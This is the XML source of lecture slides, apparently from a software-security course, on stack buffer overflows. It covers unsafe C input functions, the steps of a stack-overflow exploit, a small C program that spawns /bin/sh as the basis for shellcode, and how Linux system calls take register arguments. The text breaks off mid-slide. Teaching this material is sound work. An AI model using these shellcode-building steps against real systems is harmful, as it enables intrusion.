          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27734260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“Overflowing” Functions </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>gets()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -- note that data cannot contain newlines or EOFs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… and also custom input routines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12467331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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How to Exploit a Stack Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different variations to accommodate different architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assembly instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux buffer overflows for 32-bit architectures explained in the paper “Smashing The Stack For Fun And Profit” by Aleph One, published on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Magazine, 49(7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38034691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dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>void main() {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   char *name[2];</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   name[0] = "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   name[1] = NULL;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(name[0], name, NULL);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	   exit(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>System calls in assembly are invoked by saving parameters either on the stack or in registers and then calling the software interrupt (80h in Linux)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18749668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System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(char *filename, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>             char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> [], </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>             char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>bh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> (index in the system call table)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Address of the program name in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> (“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Address of the null-terminated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> vector in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> of “/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>”, NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Address of the null-terminated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> vector in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> (e.g., NULL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> 80h (note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sysenter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>sysexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> is the more optimized way to invoke system calls)   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30888885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System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="538627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>void exit(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> status)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Value 1 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Exit code in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="MS Mincho" pitchFamily="49" charset="-128"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
